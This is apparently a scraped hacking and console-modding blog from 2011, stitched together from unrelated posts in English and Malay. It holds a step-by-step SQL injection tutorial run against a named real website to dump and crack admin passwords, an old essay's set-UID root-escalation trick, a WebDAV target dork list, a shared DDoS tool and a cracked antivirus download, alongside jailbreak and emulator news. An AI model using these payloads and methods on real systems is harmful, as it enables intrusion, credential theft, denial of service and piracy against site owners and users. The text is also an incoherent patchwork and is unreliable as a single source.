command and go away until the victim arrives..The set-UID (set-GID)notion must

be used carefully if any security is to be maintained. The first thing to keep

in mind is that a writable set-UID file can have another program copied onto

it.



For example, if the super-user command is writable,anyone can copy the shell

onto it and get a password-free version of Shell Unix.A more subtle problem can

come from set-UID programs which are not sufficiently careful of what is fed

into them.To take an obsolete example,the previous version of the mail command

was set-UID and owned by the super-user.This version sent mail to the r

ecipient's own directory.The notion was that one should be able to send mail to

anyone even if they want to protecttheir directories from writing. The trouble

was that mailwas rather dumb:anyone could mail someone else's priva te file to

himself.Much more seriousis the following scenario: make a file with a line

like one in the password filewhich allows one to log in as the super-user.Then

make a link named ``.mail'' to the password file in some writable directory on

the same device as the password file (say /tmp). Finally mail the bogus login

line to /tmp/.mail;You can then login as the superuser,clean up the

incriminating evidence,and have your will.



The fact that users can mount their own disks and tapes as file systems can be

another way of gaining super-user status.Once a disk pack is mounted, the

system believes what is on it.Thus one can take a blank disk pack,put on it

anything desired,and mount it.There are obvious and unfortunate consequences.

For example:a mounted disk with garbage on it will crash the system;one of the

files on the mounted disk can easily be a password-free version of Shell Unix;

other files can be unprotected entries for special files. The only easy fix

for this problem is to forbid the use of mount to unpriv- ileged users.A

partial solution, not so restrictive,would be to have the mount command examine

the special file for bad data,set-UID programs owned by others ,and accessible

special files,and balk at unprivileged invokers.





Scott Walters London, CANADA
walterss@julian.uwo.ca
PGP 31 03 1B E1 C7 6E 3A EC 97 32 01 BA 5B 05 5D FB
finger me for public key block
MIME-mail welcome

'Beware the fury of a patient man.'

Monday, 26 December 2011

multiMAN 02.08.10 Update Released

What else is new? Deank's multiMAN 02.08.10! And she's all back to normal according to Dean, which the change log will explain:

multiMAN 02.08.10 UPDATE CHANGELOG
Backup from PS3 game discs now works as it should
You can still launch PSX games from XMMB Game Column
You can still launch PS3 game backups from DVD-R/RW / BD-R/RE
You cannot create ISO backups or access non-genuine PS3 game discs
You will see a “STAR” icon in XMMB Game column, which you can use to launch your PSX backups.

To keep the same functionality as before you can turn on “Direct Disc Access” from XMMB Settings column.
Press [TRIANGLE] -> Enable Direct Disc Access

When in Direct Disc Access mode you can do all the stuff you did before, except “creating backups of PS3 Game Discs”.

There you have it. Download the base package and the update right here ... not to mention the emulator pack, because ya gots to have that.

multiMAN 02.08.10 UPDATE

Xbox Backup Creator v2.9.0.350 Released

of the new topology data introduced in the firmware. As noted in the release of LT+ v3.0, the topology data allows you to correctly answer the unique AP25 challenges introduced during the Metro dashboard beta.

Build 350 also features a few other changes such as the removal of the SplitVid and ISO tagging features, bugfixes for XGD1 titles and XGD3 drive response SS details. Other additions include tweaks here and there. In order to set Xbox Backup Creator to use the new topology data:
Click on the 'Image Tools' tab and select the 'Inject' radio button.
Load the image file that you want to patch.
Click on the 'AP25 Sector' button.
Select the necessary .bin file according to the game you're patching.
Save the image and burn using a Liteon iHas drive flashed with the iXtreme Burner MAX firmware.

Xbox Backup Creator 2.9.350

sn0wbreeze v2.7.2

ih8sn0w's jailbreak/unlock tool for Windows

sn0wbreeze supports the following devices:
iPhone 3G[S]/4
iPod Touch 3G/4
iPad 1G
Apple TV 2

sn0wbreeze-v2.7.2.zip 22.55 MB

WebDav Dork - Google Dork Webdav

Webdav Dork
Webdav Google Dork

Ramai yang cari google dork untuk webdav.. jadi I buat la sat list utk u all.. have fun..

inurl:.co.id/*.asp
inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp

creadit to 5y4kill3r

Get RemoteJoyLite Working On 6.60 PRO

For the PSP faithful that are still using custom firmware, 6.60 PRO to be exact and has been wondering about RemoteJoyLite support, let me tell you this... There isn't. However, no official release does not mean that other won't be working towards finding a workaround. HolmesInFive of 1337Mods has drafted up a quick tutorial to get the latest RemoteJoyLite plugin working on 6.60 PRO.

This tutorial was tested on 6.60 PRO B-9/B-10 but it should work on previous revisions. (And it was shortened where necessary)

First off, grab PSPDisp and RemoteJoyLite and extract them to a folder on your desktop. From there:

1. Install PSPDisp normally but do not select the option for Autostart. If you get a prompt about the drivers being unsafe/unsigned, just ignore it and continue with the installation.

2. After running PSDisp.exe, connect your PSP to USB Mode and navigate to the 'seplugins' folder on the root of your memory stick. There you need to open your VSH.txt, GAME.txt and GAME150.txt files (if you don’t have those text files then make them) and copy/paste this path into a new line in each file: ms0:/seplugins/RemoteJoyLite.prx 1
If you have a PSP Go, then your path will be ef0:/seplugins/RemoteJoyLite.prx 1

If you wish to use RemoteJoyLite with Popsloader (PSX), then copy these two paths to separate lines in the 'pops.txt' file: ms0:/seplugins/RemoteJoyLite.prx 1 ; flash0:/kd/usb.prx 1

3. Find the RemoteJoyLite folder and copy the RemoteJoyite.prx file to the 'seplugins' folder.

4. After this, disconnect your PSP and reboot. Once in the XMB, plug your USB in and run “RemoteJoyLite_en” found in the RemoteJoyLite folder. If setup correctly, RemoteJoyLite should be displaying your PSP's screen.

souce

PS Vita Firmware xTractor v2.01 Released

SKFU has released PS Vita Firmware xTractor 2.01 ... and it's now compatible with Linux, as well introduces some other features: Download Vita firmware, a filename fix and other minor stuff. This app will take a Vita firmware file (PSP2UPDAT.PUP) and as the name suggests extract the contents -- it won't decrypt though ... not yet anyway. Nonetheless it's a step in the right direction.
I tried PS Vita Firmware xTractor out and sure enough it works. You can download the firmware 1.50 JP release and try yourself. The download function simply opens an XML file (on Sony's end) where you can copy/paste the direct link to the actual PUP. Only the JP version is out; US and EU you gotta wait for.

Download PS Vita Firmware xTractor for Windows and Linux below.

vita_win_201.rar 4.06 MB
lnx_vita_201.rar 4.5 MB

Berbogel Promosi Sabun Mandi

Dengan hanya berbekalkan tuala yang berbalut di kepala tanpa seurat benang,pekerja sementara yang diupah oleh pegawai pemasaran syarikat sabun di China berbogel dan melayan penonton-penonton tanpa segan silu malahan mempelawa penonton yang rata-ratanya kaum lelaki untuk menyapukan sabun itu ke badan mereka..wah..beruntung sangat dah ni.Dah la free show,boleh usap-usap sabun lagi ye.Brutal jugak China ni eh.

put knife on ur face O_o

SciVi 3D Scanning Tool Framework

A small group of researchers combined with a bunch of students from the Technical University of Bergakademie Frieberg have released their own 3D scanning tool taking advantage of the Kinects depth data called. They named the framework SciVi. The application uses AR markers to calibrate the "extrinsic parameters of the camera" and then align different views of the object being scanned.

The SciVi framework then processes the data in order to extract the point cloud data. The end result is a 3D mesh which is generated using Poisson surface reconstruction.

The full source code and download have been made available on their site if you're interested in trying it out. A disclaimer comes with the download in the sense that it was developed primarily as a school project and may content bugs and other "open ends"

For more visit the SciVi official project page

latest_scivi_framework.zip 12.78 MB

Self Projector Using Kinect, Processing and a Transcreen

Here's a cool and interesting visual project that would be great for any type of live performance. Built in Processing, the Kinect captured image is projected onto a TransScreen. The end result is a digital shadow of sorts that can be overlaid onto people in real-time. The program can control the different visual display modes creating a wide array of possibilities. Check out the video to see this creative hack in action.

http://vimeo.com/17821576

Evoluce Windows 7 SDK Released

The Evoluce SDK for Kinect and Windows 7 is now available and enables developers to create noncommercial applications with a natural user experience. The SDK uses depth sensing information like human motion tracking from devices like the Microsoft Kinect sensor and Asus Xtion Pro. Users will benefit from easy and intuitive applications in areas like events and exhibitions, education, digital signage and healthcare. The free Evoluce SDK for Kinect can be downloaded today at http://www.evoluce.com/_win-and-i/en/software/sdk-for-kinect/index.php

The Evoluce SDK includes high-quality technical documentation and several samples like the demo application “Motor Sport”. This sample shows how users can navigate through a menu and control images and videos by simple hand movements. Users can take control by waving the hand as long as they are within the range of the sensor that allows controller-free interaction up to a distance of 4.5 m. The demo application can be downloaded at http://www.evoluce.com/_win-and-i/en/software/overview/index.php?we_objectID=64

The Evoluce SDK enables our partners to explore an unlimited number of inspiring possibilities of depth-sensing devices in combination with intelligent software”, says Wolfgang Herfurtner, CEO of Evoluce. “Non-gaming applications can now be controlled by the wave of a hand! “

The Evoluce SDK for Kinect, which works with Windows 7, includes drivers and rich APIs for natural user interfaces, installer documents and resource materials and is powered by NITE and OpenNI. The Evoluce SDK provides capabilities to developers building applications with C++, C# using Microsoft® Visual Studio® 2010.

Evoluce will release a commercial version of the Evoluce SDK for Kinect at a later date.

Watch the video about the Evoluce SDK for Kinect incl. the demo application “Motor Sport” here:http://www.evoluce.com/_win-and-i/en/software/sdk-for-kinect/index.php?we_objectID=64

Sony

Sony PlayStation emulators for the iPhone

psx4iphone v0.1.0

New Case Adds Unlocked SIM Slot to Jailbroken iPhones

Vooma has announced an iPhone case with a backup battery and an unlocked SIM slot, which adds to it's awesomeness The case works with a jailbreak only app that emulates the iPhone's native phone app to allow calls via the external SIM. Essentially, the case unlocks any jailbroken iPhone.

John Biggs, from TechCrunch tried a pre-release version of the case and was, apparently, very impressed.

Biggs states that once Peel PG92 is all set up, it works seamlessly. and even uses a similar interface to Apple’s own dialer. He notes that it's clear that the programmers had to cut a few corners to get the look and feel correct.

Biggs notes the dialing screen is actually a bitmapped copy of the original dialer and the letters and numbers are slightly warped. He goes on to say that all of the major functionality is recreated in the Vooma app.

It appears that the case fits mini-SIM cards, not the micro-SIM that fits in the iPhone 4 and 4S. Also, the external SIM could be used for voice calls only -- data most likely goes through the SIM card that's installed in the iPhone. Because the external SIM is used via its own app the internal SIM can still be used for voice calls even with the case installed.

Vooma has a sign-up form on its homepage to get more information on the Peel PG920, but the company has disclosed no details about pricing or availability.

PwnageTool 4.3.2 Releases -- Supports iOS 4.3.2 untether

iPhone Dev Team have updated the

ir jailbreak tool, PwnageTool, to include the recent iOS 4.3.2 untether from @i0n1c.

Like Redsn0w, PwnageTool 4.3.2 supports all devices that actually support iOS 4.3.2, except iPad 2:
iPhone3GS
iPhone4 (GSM)
iPod touch 3G
iPod touch 4G
iPad1

From iPhone Dev Team blog:

PwnageTool 4.3.2 now includes the iOS 4.3.2 untether from @i0n1c. (And look, the PwnageTool and iOS version numbers actually match!).

Note that there’s a corresponding update to ultrasn0w, which has been bumped up to v1.2.2 to get along with iOS 4.3.2 (the ultrasn0w update does not include any new baseband support!). Please reboot your iPhone using the normal “slide to power off” swipe after installing ultrasn0w 1.2.2.

PwnageTool 4.3.2 is still Mac OS X only.

PwnageTool_4.3.2.dmg 28.54 MB

Update On iOS 5.0.1 Untethered Jailbreak [Not yet released]

You may already know that pod2g has developed a untethered jailbreak for iPhone 4, iPhone 3GS, iPod touch 3G, iPod touch 4G and Apple TV 2G running iOS 5.0.1. Pod2g has made additional progress on iPhone 4S and iPad 2 untethered jailbreak.

He has announced that he has handed over the details of the untethered jailbreak for iPhone 4, iPhone 3GS, iPod touch 3G, iPod touch 4G and Apple TV 2G to Chronic Dev team. Meanwhile, he will focus on getting an untethered jailbreak going for A5 processor devices such as the new iPhone 4S and iPad 2.

He writes that he's read the comments on the blog, and knows that a lot of people are waiting for the A5 jailbreak. He also realizes that there are tons of people out there with A4 or even earlier devices who wants the untether now and don't care about A5 support now. Could be interesting to way till A5 support is finished to release or even 5.1, so that we don't waste an exploit that took me months to find and develop.

He states he needs to focus on bring A5 support and hopes he can find a quick path.

He also explains that he has given all the details to the Chronic Dev Team so that they can finish, test, integrate and release the A4 jailbreak as soon as possible. He says that he will not put all his energy into A5 support!

Unfortunately, it might end up disappointing some people who were eagerly waiting to release the untethered jailbreak in the next few days, however, good news for iPhone 4S and iPad 2 users who currently can't jailbreak their iOS devices.

Saurik Is Coperating With Pod2G To Solve Cache Issue In Untethered Jailbreak For iPhone 4S


Today, Chronic Dev Team's member pod2g --the iOS hacker working on an untethered jailbreak for iOS 5.x-- updated his blog announcing thatt Jay Freeman (Also known as Saurik)-- hacker/developer of Cydia-- will be helping him (pod2g) solve cache issue in iPhone 4S untethered jailbreak.

pod2g writes that he figured out the A5 cache is not a problem anymore. He states that he sorted it out by doing the untether in a single thread and by flushing all the dcache then all the icache in a row at a strategical point of the process. He said took him over a hundred of tests to find the key. He then linked to ARM (source link) explaining issues related to self modifying code (or code patching) on the ARM platform.

He goes on to say that he spoke with Saurik about the launchd boot process, and said Saurik found one missing piece of the puzzle he (pod2g) needed to have a perfectly stable jailbreak.

Pod2g claims that joining with Saurik in coding, an untethered iOS 5.0.1 jailbreak should be expected in the very, very near future--as in a few days. However, still no date set in stone.

Twinaphex Emulators - Pack Compiled by pete_uk

PlayStation 3 developer pete_uk has released a compiled pack which contains the many emulators updated by Twinaphex. This pack includes Vice-Next and FBA-Next standalone and the following which are multiMAN compatible. FCEU-Next, VBA-Next, SNES9x-Next and Genesis-Next. Please note that these emulators originate from Twinaphex's github linked in the quote below.

A quote from pete_uk:

As some of you already know, I have recently been releasing compiled versions of Twinaphex's emulators. To make it easier for every one, I am today releasing new commits of all of Twinaphex's Emulators in one pack. Please READ the notes to FBA-Next and VBA-Next.

Included are:

Multiman Compatible:

FCEU-Next: Famicom/NES Emulator

Commit: 06cbc88957ebd089dcde4cf41c97ef5040bb669b (15/12/2011)

VBA-Next: Game Boy, Gameboy Color, Super Game Boy & Gamboy Advance Emulator

Commit: 8ff8246f73e66271a46574681ae80781dfbae5e5 (15/12/2011)

Notes: There is currently an issue with loading ZIPPED Roms, Please UNZIP your Roms first!!

SNES9x-Next: Super Nintendo / Super Famicom Emulator

Commit: 04f58848306c558991930d6c9db1b1c6a10e0414 (22/12/2011)

Genesis-Next: Genesis / Megadrive, Master System, Game Gear Emulator

Commit: 5ff4baeef68f70bc0059173fbc8b4147f160ef74 (15/12/2011)

Not Multiman Compatible:

Vice-Next: Commodore 64 Emulator

Commit: 6c47adcf45b804bfa34a512af8ec2dca63efe2da (09/12/2011)

FBA-Next: Multi Arcade Machine Emulator

Commit: 42621334054fb4faaf90ba37da2f8a836cca5c95 (18/10/2011)

Notes: This is not the newest commit available. This version is more stable and all options work as desired. If you experience a black screen crash on opening, Use Multiman or FTP to transfer your roms to "/dev_hdd0/game/FBAN00000/USRDIR/roms"

Thanks to Twinaphex (https://github.com/twinaphex) for all of your work on these emulators and your continuing improvements to them.

Download: NEXT Emulator Pack

Game Save Now Working for PS3 Game Sonic Generations

A PlayStation 3 developer, chnps3hax, has released a fix that many where anticipating. Sonic Generations was released a while back but unfortunately game saves did not work. chnps3hax has released a fix for those of you tired of restarting the game.

How to install:
Download Sonic_Generation_EU_fix.rar
Extract files.
Use multiMAN to mount game and play.

Download: Sonic_Generation_EU_fix.rar

Wololo Confirms Teck4's PS Vita PSP Exploit

News of an exploit running on the PS Vita has been circulating the web recently. The exploit allows HBL (Half-Byte Loader) to partially run on the PS Vita through it's PSP emulator. Wololo has confirmed Teck4's exploit and shows us a video of it running on the PSP 1000 and PS Vita.

Last week, an exploit on the PS Vita through the PSP emulator was announced by Mamosuke. The exploit was found by Teck4, and, we won’t stress it enough, is a PSP exploit that gives us user mode access within the PSP emulator on the Vita. So this is not a Vita exploit per se, but it’s still very cool. Mamosuke confirmed this with a video a few days ago, and today I was able to confirm the exploit myself as shown in the video below (and I must admit that I spent way too much time working on that basic flame effect). The video below shows the exploit running on both a PSP 1000 and the PS Vita.

I spent a good amount of time today confirming some of my hopes that it will be possible to run HBL, at least to some extent, with that exploit. It doesn’t mean I have ported HBL to the Vita yet, but I have strong hopes this will be possible. A handful of hackers are working on bringing HBL to the Vita (I won’t mention their names here as I don’t know if they want to be contacted on the subject), and it should be “relatively” easy to get something to work fairly soon. (It should be noted though that the Vita is quite sensitive and crashed on me several times when it went into “sleep” mode from the exploit screen… from there – am I just paranoid? – it seems it is impossible to reboot the machine for almost 10 minutes, which made me think I had bricked my vita… could it be a anti-hacking security? If the console detects several crashes, it takes longer to boot, in order to prevent brusteforce types of attacks?)

I won’t discuss any release yet, it doesn’t depend on me only (this is, after all, Teck4′s exploit), but if I have my opinion to give on the subject, I would suggest to wait until the Vita is released in Europe and in the US. This gives us some time to polish HBL on this device, and hopefully the vulnerabilities we use to run HBL won’t have been patched by then.

This is of course just a challenge with little to no practical interest… once we publicly reveal the exploit (in particular, the game used in it), it will be extremely easy for Sony to patch it (or remove the game from the Playstation Store), so probably only a few people will be able to benefit from it… but only time will tell, there is still hope, after all, that Sony doesn’t care about a tool that allows us to run user mode psp homebrews in a sandboxed emulator.
Here’s also a screenshot since there is not autofocus on camera

Sakit itu nikmat

Sakit itu nikmat. Sebab apa? Sekurang-kurangnya kita boleh mengetahui sejauh manakah sistem pertahanan kita mampu melawan penyakit. Sakit macam demam, batuk, selesema itu dikira sebagai sakit yang biasalah. Rata-rata manusia mesti pernah kena demam sekurang-kurangnya sekali dalam hidup mereka.

Aku jarang sakit. Bukanlah sebab aku mengamalkan gaya hidup yang sihat pun. Aku jarang bersenam. Tapi tak tahulah kalau mengejar bas, mengejar keretapi waktu nak ke pejabat tu dikira sebagai aktiviti senaman. Adegan kejar-mengejar kenderaan awam ialah adegan yang biasa aku buat setiap hari Isnin hingga Jumaat, pada waktu puncak.

Baru-baru ini aku diserang demam yang agak kuat. Suhu badan meningkat, seram sejuk, lagi-lagi kalau sebelah malam. Rasa macam kena denggi pun ada. Aktiviti demam teruk ni sebenarnya aktiviti tahunan bagi aku, sebab setiap tahun pun memang macam ni. Dulu aku pun pelik, kenapa jarang-jarang sakit? Tapi bila sakit, memang kena kaw-kaw punya, macam kopi o kaw.

Tapi sakit ni bagus sebenarnya. Bagi orang yang jarang sakit macam aku ni, aku boleh tahu sejauh manakah keupayaan sistem pertahanan badan aku untuk kembali pulih. Pada waktu artikel (artikel la sangat) ini sedang ditaip, aku masih lagi dalam proses menyembuhkan diri. Dah dekat seminggu jugalah demam ni.

Lagi satu, masa ni la Allah nak uji kesabaran kita. Baru sakit sikit je bro, takkan la tak boleh tahan kan? Jadi baguslah sebenarnya sakit ni. Nak cerita pun malaslah, boleh gunakan enjin carian seperti Google, Yahoo, Bing dan sebagainya untuk mencari hadis tentang hikmah sakit ni.

Kesimpulan yang dapat aku buat, kalau sakit tu, tak perlulah nak mengeluh. Bersyukurlah sebab Tuhan nak uji kita. Insan-insan terpilih je yang diberi ujian ni. Kalau para nabi dan rasul, ujian diorang lagilah dahsyat. Alhamdulillah.

Oh ye, jangan lupa habiskan antibiotik anda.

How to disable Facebook Timeline and get the old profile back

Editors' note (December 19, 2011): This method for removing Timeline only applied to those who enabled it before its public release. Now that it's being rolled out to everyone, there is no way to remove Timeline and revert back to the old profile.

When Facebook Timeline was announced, it didn't take long for the Internet to figure out that even though the new profile design isn't yet available to the public, anyone could get it immediately with this little hack.

Today, over 1.5 million users have activated Timeline with this workaround, making the new profile visible to each of them and anyone else who has enabled it.

Eventually, Facebook will mandate Timeline for everyone, and when that happens, expect a lot of backlash. Many people, even those who opted in to the new design, seriously dislike it. They're calling it narcissistic, cluttered, and creepy.

If you concur, and you were one of those people who enabled Timeline, there's still a way to enjoy the old profile design (while it lasts.)

Step 1: Head to the Facebook Developers page where you originally created an app to enable Timeline. Click "Edit app."
(Credit: Screenshot by Sharon Vaknin/CNET)


Step 2: The only way to remove Timeline is to delete the app. If you are an actual developer, you're out of luck. Otherwise, click "Delete app" in the left sidebar.
Once you confirm the app deletion, your Facebook Timeline will be disabled.
About Sharon Vaknin

Sharon Vaknin is a CNET How To expert focusing on mobile devices, Web services, and computing. When she's not giving tech advice, she's cooking, working out, or eating sushi.

Sunday, 25 December 2011

hoic2.1 ddos

salam, hari ni ak update berkongsi satu tool yg cukup powerfull

download

Saturday, 24 December 2011

Assalamualaikum Kepada Yang Islam Dan Selamat Sejahtera Kepada Yang Bukan Islam
Hari Ini Afnum Nk Ajar Korg Apa yg afnum jumpa dkt http://www.hackforums.net/index.php
hihi

baiklah mari kita mulakan

1.Gunakan Dork Ini Di Google ye

Disebabkan terlalu Bnyk List Nye
jadi afnum terpaksa la letak dekat Pastebin ye :D
ni link nye:http://pastebin.com/5qG5zwUy


Sekarang Kita Nk Check Url yg korg pilih ni Vuln atau tidak?
kita hanya perlu letakkan ' di belakang url
Skrg Kita Da Dpt target kita

Example:http://www.cocobod.gh/news_details.php?id=30

Skrg ni baru la kita bole tengok yg ianya vuln ataw tidak mcm yg saya type dekat atas tadi
hanya Letakkan ' di belakang url

Example:http://www.cocobod.gh/news_details.php?id=30'


Kalau Kita DApat Eror mcm gambar dekat bwh ni.itu bermakna yg website ini VULNRABLE
Mari kita teruskan ke langkah yg seterusnya

How To Find Columns Count:

Lepas kita dah ada Vuln site Kite kene la Cari columns.Untuk Mencari columns
anda hanya perlu tambah "Order by X--" Di hujung URL...X adalah nombor 1 hingga Tidak terkira Oleh saya..hihihi

Sebagai contoh, kita mempunyai Website Yg vuln dan kita Cuba Untuk Kira Columns Tersebut,
kita tambah order by 1-- pada akhir URL,Dan Order By 2--, Dan seterusnya.Jangan lupa untuk Sentiasa meningkatkan bilangan sehingga anda mendapat Error dalam laman web anda
Mcm ni:
Jadi Di Website Yg Kita "Target" Tadi Kita Telah MEnggunakan Comand Seperti Berikut:

http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column/error

Disebabkan Sampai Columns no 8 Kita DApat Error
ini Bermakna Columns nombor 8 tidak wujud di website tersebut jadi
Kita akan hanya guna columns 7 sahaja

How to Find The Accessible Columns:

Sekarang, kita dah Tahu bahawa kiraan Columns adalah 7, langkah seterusnya adalah untuk menyemak acsessable columns, untuk berbuat demikian, kita menggunakanini querie "UNION SELECT Number,of,columns--" seperti ini:
Example:http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--


JGN LUPA LETAKKAN TANDA - di belakang no
mcm ni
http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--
jgn lupa ye~

Dan Kita Akan Dapat Benda Mcm Ni
Ini bermakna bahawa kita boleh mendapatkan maklumat dari Columns 6,2 3!


How To Get MySQL DB Version:
Skarang ni kita kena taw MySQL DB Version untuk tahu jika kita boleh Exploit
Website ini atau tidak..Kalau Site Yg Menggunakan MySQL 4.X.X Anda Tidak Akan Dapat MengExploit nya Tetapi Version 5.x.x Ke Atas Adalah Exploitable

Cara untuk Mengetahui MySQL DB Version,Gantikan No Colum Yg Tersenarai Di Website Td itu Dengan version() Ataupun @@version Tak ada beza pn antara dua comand ni

Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7-- or http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,version(),7--

Hasilnya Akan Muncul Seperti Ini:
Inin Bermaksud Yang Kita Boleh Ke Langkah Yang Sterusnya

How To Find Database Name:

Sekarang kita akan inject site ini untuk mencari Nama DB,Untuk melakukan ini.
gantikan version() Atau @@version kepada "group_concat(schema_name)",
dan tambah Dekat belakang URL tu "from information_schema.schemata--"

Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Kita da dapat 2DB dekat site ni
jadi kita akan gunakan salah 1 DB ini
Jadi,untuk menggunakan DB yang Digunakan site ini,Kita kene gantikan "group_concat(schema_name)" Kepada "concat(database())"

Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

Hasil:
Tahniah!
Kita da dpt DB yg Digunakan Site ini

How to Get The Table Names:

Sekarang Ni Kita Nk Kena DApatKan Table Names ,Untuk melakukan ini,
gantikan "concat(database())" kepada "group_concat(table_name)" dan gantikan
"from information_schema.schemata--" Kepada "from information_schema.tables where table_schema=database()--" dekat akhir URL
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

Haslinya:
OMG.nampaknya kita da jumpa Table Names.dan Kita da jumpa Admin ^^

How To Get Column Names:

Untuk Mendapatkan Column Names kita akan menggunakan comand ini
Gantikan "group_concat(table_name)" kepada "group_concat(column_name)"

Dan juga Anda harus gantikan "from information_schema.tables where table_schema=database()--" Kepada from information_schema.columns where table_schema=database()--


Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
OMG2 skrg ni kita da dapat Column names yg menyimpan Username dan Password

How To Get Informations From Columns:

Sekarang Ni Kita Da Sampai ke Langkah yg Terakhir!
OMG Seronoknye :D

Sekarang ni kita akan dapatkan INfo Admin daripada Columns
Bagaimanakah Cara Untuk kita melakukannya?
senang je..hihihi
mari ikut saya lakukannya :D

Example:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from cocobod_gh.coc_admin--

0x3a membawa maksud ":"


"cocobod_gh"
adalah DB yg digunakan Site ini jadi jika site lain menggunakan DB yang bernama lain..
korg kena la tukar nama DB ni ye


"coc_admin--"
adalah nama table yg kita guna tadi
mcm dekat
HOW TO GET TABLE NAMES


kalau site lain menggunakan
contoh:new_admin
korg kene tukar coc_admin kepada new_admin


Hasilnya!:
Alahai Kita dapat pasword yg Di Telah di Crypted Oleh MD5
Jadi kita kene la pigi Encrypt MD5 ini
gunakan Site ini untuk Encrypt MD5
http://www.md5decrypter.co.uk/
Dan Terpapar La Password yg di Crypt Oleh MD5 ^^

Translated and Edited By:aFnuM
Any question about This tut Plz Ask Us At
Sharing Is Caring

Credit To:Hackforums

Friday, 23 December 2011

Macam Mana Nak Buat Duit Dengan Facebook

Bagaimana nak buat duit dengan facebook? aha..

Jom kita buat duit dengan facebook..
Lolzzzz...

Credit : Sang Pisang HC

webMedia plugin for Showtime Media Player

PlayStation developer Andreus Sebes has released a plugin for Showtime Media Player. webMedia plugin for Showtime allows you to read RSS feeds, live TV & radio and XML data files on your PlayStation 3.

webMedia plugin for Showtime is a free internet source media reader. Can read RSS feeds, Imagecast, Podcast, Videocast, Live TV& Radio. I built this plugin for my own use because I wanted more than current Showtime plugins can give. The purpose of this plugin is to have the possibility to read free media sources available on the Internet. I thank Andreas Öman for Showtime, a wonderfull application, for always improving it and for all the plugin documentation. I also thank facanferff and NP for their excelent plugins.


Release notes: 1.0: Initial version
Read RSS feeds (RSS, Imagecast, Podcast and Videocast)
Read Live TV/Live Radio (rtmp)
Read up to four XML data files from HTTP or SMB (just one URL needed)
Settings for choose if want to aggregate sources
By publisher
By theme
By country (242 countries by default)
By type (6 types by default)
If you want to, you can choose a parental control level (1 to 9) for each source
If you want to, you can choose if each source is your favorite
Extremely flexible, for each source, you can have a simple xml with title and link or a more complex xml with title, link, thumbnail, themes, publisher, country, type, parental control and if is your favorite
Some debug settings
Installing:

webMedia, is available directly from Showtime plugin repository. Just install it from there (the puzzle peace in showtime homepage right top corner). Create your sources XML file Put the path of your source xml file in webmedia plugin showtime settings (for those that don't know how to do it, see the readme file) Run it!

Suggestions & feedback are welcome. But take into account that there are problems related with showtime that are not related to this plugin. So if you have freezes or something like that, add a bug to showtime tasks in showtime website.

download

ESET Smart Security Nod32 Final + Crack

ESET Smart Security is the first representative of the new approach to truly integrated computer security for all users. It utilizes the speed and precision of ESET NOD32 Antivirus, which is guaranteed by the most recent version of the ThreatSense(R) scanning engine, combined with the tailor-made Personal firewall and Antispam modules. The result is an intelligent system which is constantly on alert for attacks and malicious software endangering your computer.

ESET Smart Security is not a clumsy conglomerate of various products in one package, as offered by other vendors. It is the result of a long-term effort to combine maximum protection with minimum system footprint. The advanced technologies based on artificial intelligence are capable of proactively eliminating the penetration of viruses, spyware, trojan horses, worms, adware, rootkits, and other Internet-borne attacks without hindering system performance or disrupting your computer .

The long-time development experience of our experts is demonstrated by the entirely new architecture of the ESET Smart Security program, which guarantees maximum detection with minimum system requirements. The complex security solution contains modules with several advanced options. The following list offers you a brief overview of these modules.

Antivirus & Antispyware
This module is built upon the ThreatSense(R) scanning core, which was used for the first time in the award-winning NOD 32 Antivirus system. The ThreatSense(R) core is optimized and improved with the new ESET Smart Security architecture.

Improved Cleaning
? The antivirus system now intelligently cleans and deletes most of the detected infiltrations without requiring user intervention.

Background Scanning Mode
? Computer scanning can be launched in the background without slowing down performance.

Smaller Update Files
? Core optimization processes keep the size of update files smaller than in version 2.7. Also, the protection of update files against damage has been improved.

Popular EMail Client Protection
? It is now possible to scan incoming mail not only in MS Outlook but also in Outlook Express and Windows Mail.

Variety of Other Minor Improvements
? Direct access to file systems for high speed and throughput.
? Blocking access to infected files
? Optimization for the Windows Security Center, including Vista.

Personal firewall
